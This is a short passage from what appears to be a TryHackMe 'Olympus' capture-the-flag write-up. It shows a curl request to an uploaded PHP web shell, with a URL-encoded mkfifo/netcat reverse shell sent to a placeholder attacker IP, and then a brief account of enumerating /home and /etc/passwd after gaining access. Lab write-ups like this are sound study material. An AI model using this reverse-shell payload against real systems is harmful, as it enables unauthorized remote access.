tomfieber/tomfieber.github.io/_posts/2022-07-19-tryhackme-olympus.md

 ```bash
 $ curl 'http://chat.olympus.thm/uploads/1b3093a1fca202e92445397dc4cc8c85.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20<ATTACKER IP>%20<LISTEN PORT>%20%3E%2Ftmp%2Ff'
 ```

+>**NOTE:** You could also send this request in a web browser if it's easier for you.

 ![](assets/images/Pasted%20image%2020220717114938.png)
 After stabilizing that shell we can do some enumeration and figure out how to move from `www-data` to a normal user.
 Looking at the `/home` directory and `/etc/passwd`, it looks like our user will be `zeus`...which makes sense because we also saw that user in the MySQL database.